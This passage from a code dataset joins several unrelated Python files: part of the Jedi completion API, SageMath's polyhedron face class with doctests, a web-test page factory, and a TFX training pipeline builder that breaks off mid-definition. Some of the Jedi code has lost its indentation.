        names = filter_follow_imports(names, check)

        defs = [classes.Definition(self._evaluator, d) for d in set(names)]
        return helpers.sorted_definitions(defs)
def usages(self, additional_module_paths=(), **kwargs):
"""
Return :class:`classes.Definition` objects, which contain all
names that point to the definition of the name under the cursor. This
is very useful for refactoring (renaming), or to show all usages of a
variable.
.. todo:: Implement additional_module_paths
:param additional_module_paths: Deprecated, never ever worked.
:param include_builtins: Default True, checks if a usage is a builtin
(e.g. ``sys``) and in that case does not return it.
:rtype: list of :class:`classes.Definition`
"""
if additional_module_paths:
warnings.warn(
"Deprecated since version 0.12.0. This never even worked, just ignore it.",
DeprecationWarning,
stacklevel=2
)
def _usages(include_builtins=True):
tree_name = self._module_node.get_name_of_position(self._pos)
if tree_name is None:
# Must be syntax
return []
names = usages.usages(self._get_module(), tree_name)
definitions = [classes.Definition(self._evaluator, n) for n in names]
if not include_builtins:
definitions = [d for d in definitions if not d.in_builtin_module()]
return helpers.sorted_definitions(definitions)
return _usages(**kwargs)
def call_signatures(self):
"""
Return the function object of the call you're currently in.
E.g. if the cursor is here::
abs(# <-- cursor is here
This would return the ``abs`` function. On the other hand::
abs()# <-- cursor is here
This would return an empty list..
:rtype: list of :class:`classes.CallSignature`
"""
call_signature_details = \
helpers.get_call_signature_details(self._module_node, self._pos)
if call_signature_details is None:
return []
context = self._evaluator.create_context(
self._get_module(),
call_signature_details.bracket_leaf
)
definitions = helpers.cache_call_signatures(
self._evaluator,
context,
call_signature_details.bracket_leaf,
self._code_lines,
self._pos
)
debug.speed('func_call followed')
return [classes.CallSignature(self._evaluator, d.name,
call_signature_details.bracket_leaf.start_pos,
call_signature_details.call_index,
call_signature_details.keyword_name_str)
for d in definitions if hasattr(d, 'py__call__')]
    def _analysis(self):
        # Run static analysis over the whole module and return the issues the
        # evaluator collected for this file, sorted by line number.
        self._evaluator.is_analysis = True
        self._evaluator.analysis_modules = [self._module_node]
        module = self._get_module()
        try:
            for node in get_executable_nodes(self._module_node):
                context = module.create_context(node)
                if node.type in ('funcdef', 'classdef'):
                    # Resolve the decorators.
                    tree_name_to_contexts(self._evaluator, context, node.children[1])
                elif isinstance(node, tree.Import):
                    import_names = set(node.get_defined_names())
                    if node.is_nested():
                        # Nested imports also define their intermediate paths.
                        import_names |= set(path[-1] for path in node.get_paths())
                    for n in import_names:
                        imports.infer_import(context, n)
                elif node.type == 'expr_stmt':
                    types = context.eval_node(node)
                    for testlist in node.children[:-1:2]:
                        # Iterate tuples.
                        unpack_tuple_to_dict(context, types, testlist)
                else:
                    if node.type == 'name':
                        defs = self._evaluator.goto_definitions(context, node)
                    else:
                        defs = evaluate_call_of_leaf(context, node)
                    # Force evaluation so problems inside iterables surface.
                    try_iter_content(defs)
                # Reset between nodes so one deep evaluation cannot starve
                # the analysis of the following nodes.
                self._evaluator.reset_recursion_limitations()
            # Only report issues that belong to this file.
            ana = [a for a in self._evaluator.analysis if self.path == a.path]
            return sorted(set(ana), key=lambda x: x.line)
        finally:
            self._evaluator.is_analysis = False
class Interpreter(Script):
    """
    Jedi API for Python REPLs.
    In addition to completion of simple attribute access, Jedi
    supports code completion based on static code analysis.
    Jedi can complete attributes of object which is not initialized
    yet.
    >>> from os.path import join
    >>> namespace = locals()
    >>> script = Interpreter('join("").up', [namespace])
    >>> print(script.completions()[0].name)
    upper
    """
    def __init__(self, source, namespaces, **kwds):
        """
        Parse `source` and mixin interpreted Python objects from `namespaces`.
        :type source: str
        :arg source: Code to parse.
        :type namespaces: list of dict
        :arg namespaces: a list of namespace dictionaries such as the one
            returned by :func:`locals`.
        Other optional arguments are same as the ones for :class:`Script`.
        If `line` and `column` are None, they are assumed be at the end of
        `source`.
        :raises TypeError: if `namespaces` is not a list of dicts, or if an
            ``environment`` keyword is given that is not an
            :class:`InterpreterEnvironment`.
        """
        try:
            # Copy each dict so later caller-side mutation does not leak into
            # completion results; this also validates the argument type.
            namespaces = [dict(n) for n in namespaces]
        except Exception:
            raise TypeError("namespaces must be a non-empty list of dicts.")
        # Bug fix: use ``pop`` instead of ``get``.  With ``get``, the
        # ``environment`` key stayed inside ``kwds`` and was then forwarded a
        # second time below, so any caller passing ``environment=...`` got
        # "TypeError: got multiple values for keyword argument 'environment'".
        environment = kwds.pop('environment', None)
        if environment is None:
            environment = InterpreterEnvironment()
        else:
            if not isinstance(environment, InterpreterEnvironment):
                raise TypeError("The environment needs to be an InterpreterEnvironment subclass.")
        super(Interpreter, self).__init__(source, environment=environment, **kwds)
        self.namespaces = namespaces
    def _get_module(self):
        # Mix the parsed module with the live runtime namespaces so both
        # statically analyzed and interpreted names resolve.
        return interpreter.MixedModuleContext(
            self._evaluator,
            self._module_node,
            self.namespaces,
            path=self.path,
            code_lines=self._code_lines,
        )
def names(source=None, path=None, encoding='utf-8', all_scopes=False,
          definitions=True, references=False, environment=None):
    """
    Returns a list of `Definition` objects, containing name parts.
    This means you can call ``Definition.goto_assignments()`` and get the
    reference of a name.
    The parameters are the same as in :py:class:`Script`, except or the
    following ones:
    :param all_scopes: If True lists the names of all scopes instead of only
        the module namespace.
    :param definitions: If True lists the names that have been defined by a
        class, function or a statement (``a = b`` returns ``a``).
    :param references: If True lists all the names that are not listed by
        ``definitions=True``. E.g. ``a = b`` returns ``b``.
    """
    # Line/column are irrelevant here; any valid position works.
    script = Script(source, line=1, column=0, path=path, encoding=encoding,
                    environment=environment)
    module_context = script._get_module()

    def to_name(tree_name):
        parent = tree_name.parent
        cls = ParamName if parent.type == 'param' else TreeNameDefinition
        # Module-level names create their context from the name itself.
        context_node = tree_name if parent.type == 'file_input' else parent
        return cls(module_context.create_context(context_node), tree_name)

    def keep(definition):
        is_def = definition._name.tree_name.is_definition()
        return (definitions and is_def) or (references and not is_def)

    all_defs = [
        classes.Definition(script._evaluator, to_name(tree_name))
        for tree_name in get_module_names(script._module_node, all_scopes)
    ]
    return sorted((d for d in all_defs if keep(d)),
                  key=lambda d: (d.line, d.column))
def preload_module(*modules):
    """
    Preloading modules tells Jedi to load a module now, instead of lazy parsing
    of modules. Usful for IDEs, to control which modules to load on startup.
    :param modules: different module names, list of string.
    """
    for module_name in modules:
        # Completing right after "x." forces the module to be fully loaded.
        snippet = "import %s as x; x." % module_name
        Script(snippet, 1, len(snippet), None).completions()
def set_debug_function(func_cb=debug.print_to_stdout, warnings=True,
                       notices=True, speed=True):
    """
    Define a callback debug function to get all the debug messages.
    If you don't specify any arguments, debug messages will be printed to stdout.
    :param func_cb: The callback function for debug messages, with n params.
    """
    # Push the callback and the per-category switches into the debug module.
    for attribute, value in (('debug_function', func_cb),
                             ('enable_warning', warnings),
                             ('enable_notice', notices),
                             ('enable_speed', speed)):
        setattr(debug, attribute, value)
| StarcoderdataPython |
1671766 | <filename>src/sage/geometry/polyhedron/face.py
"""
A class to keep information about faces of a polyhedron
This module gives you a tool to work with the faces of a polyhedron
and their relative position. First, you need to find the faces. To get
the faces in a particular dimension, use the
:meth:`~sage.geometry.polyhedron.base.face` method::
sage: P = polytopes.cross_polytope(3)
sage: P.faces(3)
(A 3-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 6 vertices,)
sage: [f.ambient_V_indices() for f in P.faces(2)]
[(0, 1, 2),
(0, 1, 3),
(0, 2, 4),
(0, 3, 4),
(3, 4, 5),
(2, 4, 5),
(1, 3, 5),
(1, 2, 5)]
sage: [f.ambient_V_indices() for f in P.faces(1)]
[(0, 1),
(0, 2),
(1, 2),
(0, 3),
(1, 3),
(0, 4),
(2, 4),
(3, 4),
(2, 5),
(3, 5),
(4, 5),
(1, 5)]
or :meth:`~sage.geometry.polyhedron.base.face_lattice` to get the
whole face lattice as a poset::
sage: P.face_lattice()
Finite lattice containing 28 elements with distinguished linear extension
The faces are printed in shorthand notation where each integer is the
index of a vertex/ray/line in the same order as the containing
Polyhedron's :meth:`~sage.geometry.polyhedron.base.Vrepresentation` ::
sage: face = P.faces(1)[3]; face
A 1-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 2 vertices
sage: face.ambient_V_indices()
(0, 3)
sage: P.Vrepresentation(0)
A vertex at (-1, 0, 0)
sage: P.Vrepresentation(3)
A vertex at (0, 0, 1)
sage: face.vertices()
(A vertex at (-1, 0, 0), A vertex at (0, 0, 1))
The face itself is not represented by Sage's
:func:`sage.geometry.polyhedron.constructor.Polyhedron` class, but by
an auxiliary class to keep the information. You can get the face as a
polyhedron with the :meth:`PolyhedronFace.as_polyhedron` method::
sage: face.as_polyhedron()
A 1-dimensional polyhedron in ZZ^3 defined as the convex hull of 2 vertices
sage: _.equations()
(An equation (0, 1, 0) x + 0 == 0,
An equation (1, 0, -1) x + 1 == 0)
"""
########################################################################
# Copyright (C) 2012 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# http://www.gnu.org/licenses/
########################################################################
from __future__ import print_function
from sage.structure.sage_object import SageObject
from sage.structure.richcmp import richcmp_method, richcmp
from sage.misc.all import cached_method
from sage.modules.free_module_element import vector
from sage.matrix.constructor import matrix
#########################################################################
@richcmp_method
class PolyhedronFace(SageObject):
    r"""
    A face of a polyhedron.
    This class is for use in
    :meth:`~sage.geometry.polyhedron.base.Polyhedron_base.face_lattice`.
    INPUT:
    No checking is performed whether the H/V-representation indices
    actually determine a face of the polyhedron. You should not
    manually create :class:`PolyhedronFace` objects unless you know
    what you are doing.
    OUTPUT:
    A :class:`PolyhedronFace`.
    EXAMPLES::
        sage: octahedron = polytopes.cross_polytope(3)
        sage: inequality = octahedron.Hrepresentation(2)
        sage: face_h = tuple([ inequality ])
        sage: face_v = tuple( inequality.incident() )
        sage: face_h_indices = [ h.index() for h in face_h ]
        sage: face_v_indices = [ v.index() for v in face_v ]
        sage: from sage.geometry.polyhedron.face import PolyhedronFace
        sage: face = PolyhedronFace(octahedron, face_v_indices, face_h_indices)
        sage: face
        A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 3 vertices
        sage: face.dim()
        2
        sage: face.ambient_V_indices()
        (0, 1, 2)
        sage: face.ambient_Hrepresentation()
        (An inequality (1, 1, 1) x + 1 >= 0,)
        sage: face.ambient_Vrepresentation()
        (A vertex at (-1, 0, 0), A vertex at (0, -1, 0), A vertex at (0, 0, -1))
    """
    def __init__(self, polyhedron, V_indices, H_indices):
        r"""
        The constructor.
        See :class:`PolyhedronFace` for more information.
        INPUT:
        - ``polyhedron`` -- a :class:`Polyhedron`. The ambient
          polyhedron.
        - ``V_indices`` -- list of sorted integers. The indices of the
          face-spanning V-representation objects in the ambient
          polyhedron.
        - ``H_indices`` -- list of sorted integers. The indices of the
          H-representation objects of the ambient polyhedron that are
          saturated on the face.
        TESTS::
            sage: from sage.geometry.polyhedron.face import PolyhedronFace
            sage: PolyhedronFace(Polyhedron(), [], [])   # indirect doctest
            A -1-dimensional face of a Polyhedron in ZZ^0
        """
        self._polyhedron = polyhedron
        self._ambient_Vrepresentation_indices = tuple(V_indices)
        self._ambient_Hrepresentation_indices = tuple(H_indices)
        # Cache the actual representation objects so that repeated access
        # does not go through the ambient polyhedron each time.
        self._ambient_Vrepresentation = tuple( polyhedron.Vrepresentation(i) for i in V_indices )
        self._ambient_Hrepresentation = tuple( polyhedron.Hrepresentation(i) for i in H_indices )
    def __hash__(self):
        r"""
        TESTS::
            sage: P = Polyhedron([[0,0],[0,1],[23,3],[9,12]])
            sage: list(map(hash, P.faces(1))) # random
            [2377119663630407734,
             2377136578164722109,
             5966674064902575359,
             4795242501625591634]
        """
        # The ambient polyhedron plus the V-indices determine the face;
        # this matches the equality notion used in ``__richcmp__``.
        return hash((self._polyhedron, self._ambient_Vrepresentation_indices))
    def vertex_generator(self):
        """
        Return a generator for the vertices of the face.
        EXAMPLES::
            sage: triangle = Polyhedron(vertices=[[1,0],[0,1],[1,1]])
            sage: face = triangle.faces(1)[0]
            sage: for v in face.vertex_generator(): print(v)
            A vertex at (0, 1)
            A vertex at (1, 0)
            sage: type(face.vertex_generator())
            <... 'generator'>
        """
        for V in self.ambient_Vrepresentation():
            if V.is_vertex():
                yield V
    @cached_method
    def vertices(self):
        """
        Return all vertices of the face.
        OUTPUT:
        A tuple of vertices.
        EXAMPLES::
            sage: triangle = Polyhedron(vertices=[[1,0],[0,1],[1,1]])
            sage: face = triangle.faces(1)[0]
            sage: face.vertices()
            (A vertex at (0, 1), A vertex at (1, 0))
        """
        return tuple(self.vertex_generator())
    @cached_method
    def n_vertices(self):
        """
        Return the number of vertices of the face.
        OUTPUT:
        Integer.
        EXAMPLES::
            sage: Q = polytopes.cross_polytope(3)
            sage: face = Q.faces(2)[0]
            sage: face.n_vertices()
            3
        """
        return len(self.vertices())
    def ray_generator(self):
        """
        Return a generator for the rays of the face.
        EXAMPLES::
            sage: pi = Polyhedron(ieqs = [[1,1,0],[1,0,1]])
            sage: face = pi.faces(1)[0]
            sage: next(face.ray_generator())
            A ray in the direction (1, 0)
        """
        for V in self.ambient_Vrepresentation():
            if V.is_ray():
                yield V
    @cached_method
    def rays(self):
        """
        Return the rays of the face.
        OUTPUT:
        A tuple of rays.
        EXAMPLES::
            sage: p = Polyhedron(ieqs = [[0,0,0,1],[0,0,1,0],[1,1,0,0]])
            sage: face = p.faces(2)[0]
            sage: face.rays()
            (A ray in the direction (1, 0, 0), A ray in the direction (0, 1, 0))
        """
        return tuple(self.ray_generator())
    @cached_method
    def n_rays(self):
        """
        Return the number of rays of the face.
        OUTPUT:
        Integer.
        EXAMPLES::
            sage: p = Polyhedron(ieqs = [[0,0,0,1],[0,0,1,0],[1,1,0,0]])
            sage: face = p.faces(2)[0]
            sage: face.n_rays()
            2
        """
        return len(self.rays())
    def line_generator(self):
        """
        Return a generator for the lines of the face.
        EXAMPLES::
            sage: pr = Polyhedron(rays = [[1,0],[-1,0],[0,1]], vertices = [[-1,-1]])
            sage: face = pr.faces(1)[0]
            sage: next(face.line_generator())
            A line in the direction (1, 0)
        """
        for V in self.ambient_Vrepresentation():
            if V.is_line():
                yield V
    @cached_method
    def lines(self):
        """
        Return all lines of the face.
        OUTPUT:
        A tuple of lines.
        EXAMPLES::
            sage: p = Polyhedron(rays = [[1,0],[-1,0],[0,1],[1,1]], vertices = [[-2,-2],[2,3]])
            sage: p.lines()
            (A line in the direction (1, 0),)
        """
        return tuple(self.line_generator())
    @cached_method
    def n_lines(self):
        """
        Return the number of lines of the face.
        OUTPUT:
        Integer.
        EXAMPLES::
            sage: p = Polyhedron(rays = [[1,0],[-1,0],[0,1],[1,1]], vertices = [[-2,-2],[2,3]])
            sage: p.n_lines()
            1
        """
        return len(self.lines())
    def __richcmp__(self, other, op):
        """
        Compare ``self`` and ``other``.
        INPUT:
        - ``other`` -- anything.
        OUTPUT:
        Two faces test equal if and only if they are faces of the same
        (not just isomorphic) polyhedron and their generators have the
        same indices.
        EXAMPLES::
            sage: square = polytopes.hypercube(2)
            sage: f = square.faces(1)
            sage: matrix(4,4, lambda i,j: ZZ(f[i] <= f[j]))
            [1 1 1 1]
            [0 1 1 1]
            [0 0 1 1]
            [0 0 0 1]
            sage: matrix(4,4, lambda i,j: ZZ(f[i] == f[j])) == 1
            True
        """
        if not isinstance(other, PolyhedronFace):
            return NotImplemented
        # Faces of different polyhedra are incomparable (identity check, not
        # mathematical equality of the polyhedra).
        if self._polyhedron is not other._polyhedron:
            return NotImplemented
        return richcmp(self._ambient_Vrepresentation_indices,
                       other._ambient_Vrepresentation_indices, op)
    def ambient_Hrepresentation(self, index=None):
        r"""
        Return the H-representation objects of the ambient polytope
        defining the face.
        INPUT:
        - ``index`` -- optional. Either an integer or ``None``
          (default).
        OUTPUT:
        If the optional argument is not present, a tuple of
        H-representation objects. Each entry is either an inequality
        or an equation.
        If the optional integer ``index`` is specified, the
        ``index``-th element of the tuple is returned.
        EXAMPLES::
            sage: square = polytopes.hypercube(2)
            sage: for face in square.face_lattice():
            ....:     print(face.ambient_Hrepresentation())
            (An inequality (1, 0) x + 1 >= 0, An inequality (0, 1) x + 1 >= 0,
             An inequality (-1, 0) x + 1 >= 0, An inequality (0, -1) x + 1 >= 0)
            (An inequality (1, 0) x + 1 >= 0, An inequality (0, 1) x + 1 >= 0)
            (An inequality (1, 0) x + 1 >= 0, An inequality (0, -1) x + 1 >= 0)
            (An inequality (0, 1) x + 1 >= 0, An inequality (-1, 0) x + 1 >= 0)
            (An inequality (-1, 0) x + 1 >= 0, An inequality (0, -1) x + 1 >= 0)
            (An inequality (1, 0) x + 1 >= 0,)
            (An inequality (0, 1) x + 1 >= 0,)
            (An inequality (-1, 0) x + 1 >= 0,)
            (An inequality (0, -1) x + 1 >= 0,)
            ()
        """
        if index is None:
            return self._ambient_Hrepresentation
        else:
            return self._ambient_Hrepresentation[index]
    def ambient_Vrepresentation(self, index=None):
        r"""
        Return the V-representation objects of the ambient polytope
        defining the face.
        INPUT:
        - ``index`` -- optional. Either an integer or ``None``
          (default).
        OUTPUT:
        If the optional argument is not present, a tuple of
        V-representation objects. Each entry is either a vertex, a
        ray, or a line.
        If the optional integer ``index`` is specified, the
        ``index``-th element of the tuple is returned.
        EXAMPLES::
            sage: square = polytopes.hypercube(2)
            sage: for fl in square.face_lattice():
            ....:     print(fl.ambient_Vrepresentation())
            ()
            (A vertex at (-1, -1),)
            (A vertex at (-1, 1),)
            (A vertex at (1, -1),)
            (A vertex at (1, 1),)
            (A vertex at (-1, -1), A vertex at (-1, 1))
            (A vertex at (-1, -1), A vertex at (1, -1))
            (A vertex at (1, -1), A vertex at (1, 1))
            (A vertex at (-1, 1), A vertex at (1, 1))
            (A vertex at (-1, -1), A vertex at (-1, 1),
             A vertex at (1, -1), A vertex at (1, 1))
        """
        if index is None:
            return self._ambient_Vrepresentation
        else:
            return self._ambient_Vrepresentation[index]
    def n_ambient_Hrepresentation(self):
        """
        Return the number of objects that make up the ambient
        H-representation of the polyhedron.
        See also :meth:`ambient_Hrepresentation`.
        OUTPUT:
        Integer.
        EXAMPLES::
            sage: p = polytopes.cross_polytope(4)
            sage: face = p.face_lattice()[10]
            sage: face
            A 1-dimensional face of a Polyhedron in ZZ^4 defined as the convex hull of 2 vertices
            sage: face.ambient_Hrepresentation()
            (An inequality (1, -1, 1, -1) x + 1 >= 0,
             An inequality (1, 1, 1, 1) x + 1 >= 0,
             An inequality (1, 1, 1, -1) x + 1 >= 0,
             An inequality (1, -1, 1, 1) x + 1 >= 0)
            sage: face.n_ambient_Hrepresentation()
            4
        """
        return len(self.ambient_Hrepresentation())
    def n_ambient_Vrepresentation(self):
        """
        Return the number of objects that make up the ambient
        V-representation of the polyhedron.
        See also :meth:`ambient_Vrepresentation`.
        OUTPUT:
        Integer.
        EXAMPLES::
            sage: p = polytopes.cross_polytope(4)
            sage: face = p.face_lattice()[10]
            sage: face
            A 1-dimensional face of a Polyhedron in ZZ^4 defined as the convex hull of 2 vertices
            sage: face.ambient_Vrepresentation()
            (A vertex at (-1, 0, 0, 0), A vertex at (0, 0, -1, 0))
            sage: face.n_ambient_Vrepresentation()
            2
        """
        return len(self.ambient_Vrepresentation())
    def ambient_H_indices(self):
        """
        Return the indices of the H-representation objects of the
        ambient polyhedron that make up the H-representation of ``self``.
        See also :meth:`ambient_Hrepresentation`.
        OUTPUT:
        Tuple of indices
        EXAMPLES::
            sage: Q = polytopes.cross_polytope(3)
            sage: F = Q.faces(1)
            sage: [f.ambient_H_indices() for f in F]
            [(1, 2),
             (2, 3),
             (2, 7),
             (0, 1),
             (1, 6),
             (0, 3),
             (3, 4),
             (0, 5),
             (4, 7),
             (5, 6),
             (4, 5),
             (6, 7)]
        """
        return self._ambient_Hrepresentation_indices
    def ambient_V_indices(self):
        """
        Return the indices of the V-representation objects of the
        ambient polyhedron that make up the V-representation of ``self``.
        See also :meth:`ambient_Vrepresentation`.
        OUTPUT:
        Tuple of indices
        EXAMPLES::
            sage: P = polytopes.cube()
            sage: F = P.faces(2)
            sage: [f.ambient_V_indices() for f in F]
            [(0, 1, 2, 3),
             (0, 1, 4, 5),
             (0, 2, 4, 6),
             (1, 3, 5, 7),
             (2, 3, 6, 7),
             (4, 5, 6, 7)]
        """
        return self._ambient_Vrepresentation_indices
    def ambient_dim(self):
        r"""
        Return the dimension of the containing polyhedron.
        EXAMPLES::
            sage: P = Polyhedron(vertices = [[1,0,0,0],[0,1,0,0]])
            sage: face = P.faces(1)[0]
            sage: face.ambient_dim()
            4
        """
        return self._polyhedron.ambient_dim()
    @cached_method
    def dim(self):
        """
        Return the dimension of the face.
        OUTPUT:
        Integer.
        EXAMPLES::
            sage: fl = polytopes.dodecahedron().face_lattice()
            sage: [ x.dim() for x in fl ]
            [-1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
             1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
             1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3]
        """
        # The empty face (no V-representation objects) has dimension -1 by
        # convention; otherwise the dimension is the rank of the
        # displacements of all generators from one chosen base point.
        if self.n_ambient_Vrepresentation() == 0:
            return -1
        else:
            origin = vector(self.ambient_Vrepresentation(0))
            v_list = [ vector(v)-origin for v in self.ambient_Vrepresentation() ]
            return matrix(v_list).rank()
    def _repr_(self):
        r"""
        Return a string representation.
        OUTPUT:
        A string listing the V-representation indices of the face.
        EXAMPLES::
            sage: square = polytopes.hypercube(2)
            sage: a_face = list( square.face_lattice() )[8]
            sage: a_face.__repr__()
            'A 1-dimensional face of a Polyhedron in ZZ^2 defined as the convex hull of 2 vertices'
        """
        # Assemble "n vertices[, m rays][, /and k lines]" with separators
        # chosen depending on which of the three kinds are present.
        desc = ''
        desc += 'A ' + repr(self.dim()) + '-dimensional face'
        desc += ' of a Polyhedron in '
        desc += self.polyhedron().parent()._repr_ambient_module()
        if self.n_vertices() > 0:
            desc += ' defined as the convex hull of '
            desc += repr(self.n_vertices())
            if self.n_vertices() == 1: desc += ' vertex'
            else:                      desc += ' vertices'
            if self.n_rays() > 0:
                if self.n_lines() > 0: desc += ", "
                else:                  desc += " and "
                desc += repr(self.n_rays())
                if self.n_rays() == 1: desc += ' ray'
                else:                  desc += ' rays'
            if self.n_lines() > 0:
                if self.n_rays() > 0: desc += ", "
                else:                 desc += " and "
                desc += repr(self.n_lines())
                if self.n_lines() == 1: desc += ' line'
                else:                   desc += ' lines'
        return desc
    def polyhedron(self):
        """
        Return the containing polyhedron.
        EXAMPLES::
            sage: P = polytopes.cross_polytope(3); P
            A 3-dimensional polyhedron in ZZ^3 defined as the convex hull of 6 vertices
            sage: face = P.faces(2)[3]
            sage: face
            A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 3 vertices
            sage: face.polyhedron()
            A 3-dimensional polyhedron in ZZ^3 defined as the convex hull of 6 vertices
        """
        return self._polyhedron
    @cached_method
    def as_polyhedron(self):
        """
        Return the face as an independent polyhedron.
        OUTPUT:
        A polyhedron.
        EXAMPLES::
            sage: P = polytopes.cross_polytope(3); P
            A 3-dimensional polyhedron in ZZ^3 defined as the convex hull of 6 vertices
            sage: face = P.faces(2)[3]
            sage: face
            A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 3 vertices
            sage: face.as_polyhedron()
            A 2-dimensional polyhedron in ZZ^3 defined as the convex hull of 3 vertices
            sage: P.intersection(face.as_polyhedron()) == face.as_polyhedron()
            True
        """
        P = self._polyhedron
        parent = P.parent()
        # Build the new polyhedron from this face's V-representation only;
        # the H-representation argument is left as ``None``.
        Vrep = (self.vertices(), self.rays(), self.lines())
        return P.__class__(parent, Vrep, None)
| StarcoderdataPython |
"""
PageFactory uses the factory design pattern.
get_page_object() returns the appropriate page object for a given page name.
Add elif clauses as and when you implement new pages.
Pages wired into the factory so far:
1. Temperature main page
2. Moisturizer page
3. Sunscreens page
Planned, but not yet handled by get_page_object():
4. Cart page
5. Payment gateway page
"""
from page_objects.temperature_main_page import Temperature_Main_Page
from page_objects.temperature_moisturizer_redirect_page import Temperature_Moisturizer_Redirect_Page
from page_objects.temperature_sunscreen_redirect_page import Temperature_Sunscreen_Redirect_Page
class PageFactory():
    "PageFactory uses the factory design pattern."

    @staticmethod
    def get_page_object(page_name, base_url='http://weathershopper.pythonanywhere.com/',
                        trailing_slash_flag=True):
        """Return the appropriate page object based on ``page_name``.

        Bug fix: the original signature placed the mandatory ``page_name``
        parameter *after* the defaulted parameters, which is a SyntaxError
        ("non-default argument follows default argument").  ``page_name`` is
        now the first, positional parameter.

        :param page_name: case-insensitive page identifier, e.g. "main page".
        :param base_url: base URL handed to the page object.
        :param trailing_slash_flag: whether the page object should append a
            trailing slash to URLs it builds.
        :return: the matching page object, or ``None`` for an unknown name.
        """
        test_obj = None
        page_name = page_name.lower()
        if page_name == "main page":
            test_obj = Temperature_Main_Page(base_url=base_url, trailing_slash_flag=trailing_slash_flag)
        elif page_name == "moisturizers":
            test_obj = Temperature_Moisturizer_Redirect_Page(base_url=base_url, trailing_slash_flag=trailing_slash_flag)
        elif page_name == "sunscreens":
            test_obj = Temperature_Sunscreen_Redirect_Page(base_url=base_url, trailing_slash_flag=trailing_slash_flag)
        return test_obj
3234077 | <gh_stars>1-10
################################################################################################################
#
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################################################
from typing import Any, Dict, List, Optional
import tensorflow_model_analysis as tfma
from tfx import v1 as tfx
from ml_metadata.proto import metadata_store_pb2
def create_pipeline(
    pipeline_name: str,
    pipeline_root: str,
    data_path: str,
    preprocessing_fn: str,
    run_fn: str,
    train_args: tfx.proto.TrainArgs,
    eval_args: tfx.proto.EvalArgs,
    serving_model_dir: str,
    schema_path: Optional[str] = None,
    ai_platform_training_args: Optional[Dict[str, Any]] = None,
    ai_platform_serving_args: Optional[Dict[str, Any]] = None,
    metadata_connection_config: Optional[
        metadata_store_pb2.ConnectionConfig] = None,
):
    """Create a TFX pipeline: ingest -> validate -> transform -> train ->
    evaluate -> (conditionally) push.

    Bug fixes relative to the previous revision:
    - removed the duplicated ``train_steps``/``eval_steps`` parameters, which
      made the ``def`` a SyntaxError;
    - added the parameters the body referenced but never declared
      (``schema_path``, ``ai_platform_training_args``,
      ``ai_platform_serving_args``);
    - removed the dead first ``Trainer``/second ``Pusher`` definitions that
      referenced undefined names (``train_path``, ``os``);
    - ``statistics_gen`` is now appended to ``components`` (it was created
      and consumed, but never registered with the pipeline);
    - the pipeline is built with ``tfx.dsl.Pipeline`` instead of the
      undefined name ``pipeline``.

    Args:
        pipeline_name: Name of the pipeline.
        pipeline_root: Root directory for pipeline artifacts.
        data_path: Directory containing the CSV input data.
        preprocessing_fn: Fully qualified name of the Transform function.
        run_fn: Fully qualified name of the Trainer run function.
        train_args: ``tfx.proto.TrainArgs`` (e.g. number of training steps).
        eval_args: ``tfx.proto.EvalArgs`` (e.g. number of eval steps).
        serving_model_dir: Filesystem push destination for blessed models.
        schema_path: Optional path to a curated schema; when ``None`` the
            schema is inferred with ``SchemaGen``.
        ai_platform_training_args: When given, train on Cloud AI Platform.
        ai_platform_serving_args: When given, push to Cloud AI Platform.
        metadata_connection_config: Optional ML Metadata connection config.

    Returns:
        A TFX pipeline object.
    """
    components = []

    # Brings data into the pipeline.
    example_gen = tfx.components.CsvExampleGen(input_base=data_path)
    components.append(example_gen)

    # Computes statistics used for validation and schema inference.
    statistics_gen = tfx.components.StatisticsGen(
        examples=example_gen.outputs['examples'])
    components.append(statistics_gen)

    # Either infer the schema from statistics or import a curated one.
    if schema_path is None:
        schema_gen = tfx.components.SchemaGen(
            statistics=statistics_gen.outputs['statistics'])
    else:
        schema_gen = tfx.components.ImportSchemaGen(schema_file=schema_path)
    components.append(schema_gen)

    # Performs anomaly detection based on statistics and data schema.
    example_validator = tfx.components.ExampleValidator(
        statistics=statistics_gen.outputs['statistics'],
        schema=schema_gen.outputs['schema'])
    components.append(example_validator)

    # Performs feature transformations.
    transform = tfx.components.Transform(
        examples=example_gen.outputs['examples'],
        schema=schema_gen.outputs['schema'],
        preprocessing_fn=preprocessing_fn)
    components.append(transform)

    # Trains a model, either locally or on Cloud AI Platform.
    trainer_args = {
        'run_fn': run_fn,
        'examples': transform.outputs['transformed_examples'],
        'schema': schema_gen.outputs['schema'],
        'transform_graph': transform.outputs['transform_graph'],
        'train_args': train_args,
        'eval_args': eval_args,
    }
    if ai_platform_training_args is not None:
        trainer_args['custom_config'] = {
            tfx.extensions.google_cloud_ai_platform.TRAINING_ARGS_KEY:
                ai_platform_training_args,
        }
        trainer = tfx.extensions.google_cloud_ai_platform.Trainer(**trainer_args)
    else:
        trainer = tfx.components.Trainer(**trainer_args)
    components.append(trainer)

    # Resolves the latest blessed model to serve as evaluation baseline.
    model_resolver = tfx.dsl.Resolver(
        strategy_class=tfx.dsl.experimental.LatestBlessedModelStrategy,
        model=tfx.dsl.Channel(type=tfx.types.standard_artifacts.Model),
        model_blessing=tfx.dsl.Channel(
            type=tfx.types.standard_artifacts.ModelBlessing)).with_id(
                'latest_blessed_model_resolver')
    components.append(model_resolver)

    # Model must beat the baseline (and a 0.5 accuracy floor) to be blessed.
    eval_config = tfma.EvalConfig(
        model_specs=[
            tfma.ModelSpec(label_key='target',
                           signature_name='serving_default',
                           preprocessing_function_names=['transform_features'])
        ],
